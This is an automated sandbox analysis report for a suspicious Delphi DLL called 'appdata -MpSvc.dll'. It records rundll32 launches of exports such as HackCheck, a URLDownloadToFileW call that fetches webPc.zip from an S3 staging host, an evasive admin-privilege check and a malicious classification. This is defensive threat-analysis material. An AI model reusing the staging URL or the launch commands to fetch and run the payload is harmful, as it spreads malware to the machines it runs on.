Windows Analysis Report
appdata -MpSvc.dll

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /webPc.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awsserver903203232.s3.sa-east-1.amazonaws.comConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_04605DCC Sleep,URLDownloadToFileW,Sleep,

12_2_04605DCC

Source: global traffic

Source: unknown

DNS traffic detected: queries for: awsserver903203232.s3.sa-east-1.amazonaws.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not Foundx-amz-request-id: K2HKDGME41DR45HNx-amz-id-2: vHV/b8VcumvIbfDGSDiVJ5K+95bt7FgHQCKQRQmubVkMWPewHm15YRYSdoTHyYBv1q62H1Rn2S3hhiPydHGYplaW7V0UmA6nContent-Type: application/xmlTransfer-Encoding: chunkedDate: Fri, 08 Mar 2024 18:51:55 GMTServer: AmazonS3Connection: close

Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: rundll32.exe	String found in binary or memory: http://www.delphiforfun.org/
Source: rundll32.exe, 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, appdata -MpSvc.dll	String found in binary or memory: http://www.delphiforfun.org/openU
Source: rundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/
Source: rundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/P
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip2xnL
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip4G
Source: rundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip94RM
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipk
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipvx
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716

Source: unknown

HTTPS traffic detected: 3.5.234.32:443 -> 192.168.2.5:49716 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A4CB04	4_2_04A4CB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_044E7220	12_2_044E7220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_044E6F60	12_2_044E6F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043CCB04	12_2_043CCB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_04117220	13_2_04117220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_03FFCB04	13_2_03FFCB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_04116F60	13_2_04116F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0494CB04	14_2_0494CB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D4CB04	15_2_04D4CB04

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 692

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: appdata -MpSvc.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal72.evad.winDLL@26/16@1/1

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Program Files (x86)\Microsoft.NET\base

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7540
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7556
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7524
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6564

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\7265f0ba-2a1a-4832-a4cd-94266d957b3e

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheck

Source: appdata -MpSvc.dll

ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheck
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 692
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,ServiceCrtMain
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",HackCheck
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",ServiceCrtMain
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",dbkFCallWrapperAddr
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",__dbk_fcall_wrapper
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7540 -s 684
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 688
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7524 -s 2152
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheck	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,ServiceCrtMain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,TMethodImplementationIntercept	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",HackCheck	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",ServiceCrtMain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",TMethodImplementationIntercept	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",dbkFCallWrapperAddr	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",__dbk_fcall_wrapper	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: C:\Windows\SysWOW64\rundll32.exe

Window found: window name: TMainForm

Found evasive API chain checking for user administrative privileges

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: appdata -MpSvc.dll

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: appdata -MpSvc.dll

Static file information: File size 26239902 > 1048576

Source: appdata -MpSvc.dll

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x24d400

Source: appdata -MpSvc.dll

Static PE information: More than 200 imports for user32.dll

Source: appdata -MpSvc.dll

Static PE information: section name: .didata

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A50CB4 push ecx; mov dword ptr [esp], edx	4_2_04A50CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A50CCC push ecx; mov dword ptr [esp], edx	4_2_04A50CCD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A7E5B4 push ecx; mov dword ptr [esp], eax	4_2_04A7E5B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A50504 push ecx; mov dword ptr [esp], edx	4_2_04A50505
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A66EF4 push ecx; mov dword ptr [esp], ecx	4_2_04A66EF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A81198 push ecx; mov dword ptr [esp], eax	4_2_04A81199
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04B152B4 push ecx; mov dword ptr [esp], edx	4_2_04B152B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A65A38 push ecx; mov dword ptr [esp], ecx	4_2_04A65A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A51270 push 04A512F3h; ret	4_2_04A512EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A50BA0 push ecx; mov dword ptr [esp], edx	4_2_04A50BA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A50BC2 push ecx; mov dword ptr [esp], edx	4_2_04A50BC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A50B28 push ecx; mov dword ptr [esp], edx	4_2_04A50B29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A50B34 push ecx; mov dword ptr [esp], edx	4_2_04A50B35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A50B1C push ecx; mov dword ptr [esp], edx	4_2_04A50B1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A47368 push ecx; mov dword ptr [esp], eax	4_2_04A47369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A50B7A push ecx; mov dword ptr [esp], edx	4_2_04A50B7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043D0504 push ecx; mov dword ptr [esp], edx	12_2_043D0505
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043FE5B4 push ecx; mov dword ptr [esp], eax	12_2_043FE5B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_044BD588 push ecx; mov dword ptr [esp], eax	12_2_044BD58A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_04401198 push ecx; mov dword ptr [esp], eax	12_2_04401199
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_044BD250 push ecx; mov dword ptr [esp], eax	12_2_044BD254
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043D1270 push 043D12F3h; ret	12_2_043D12EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_044952B4 push ecx; mov dword ptr [esp], edx	12_2_044952B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043C7368 push ecx; mov dword ptr [esp], eax	12_2_043C7369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043D0CB4 push ecx; mov dword ptr [esp], edx	12_2_043D0CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043D0CCC push ecx; mov dword ptr [esp], edx	12_2_043D0CCD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043E6EF4 push ecx; mov dword ptr [esp], ecx	12_2_043E6EF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043E6F30 push ecx; mov dword ptr [esp], ecx	12_2_043E6F34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_046058E8 push 0460592Eh; ret	12_2_04605926
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043E5A38 push ecx; mov dword ptr [esp], ecx	12_2_043E5A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043D0B34 push ecx; mov dword ptr [esp], edx	12_2_043D0B35

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C2A8FC IsIconic,	4_2_04C2A8FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C2A980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	4_2_04C2A980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_045AA8FC IsIconic,	12_2_045AA8FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_045AA980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	12_2_045AA980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041DA8FC IsIconic,	13_2_041DA8FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041DA980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	13_2_041DA980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_04B2A8FC IsIconic,	14_2_04B2A8FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_04B2A980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	14_2_04B2A980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04F2A8FC IsIconic,	15_2_04F2A8FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04F2A980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	15_2_04F2A980

Source: C:\Windows\System32\loaddll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
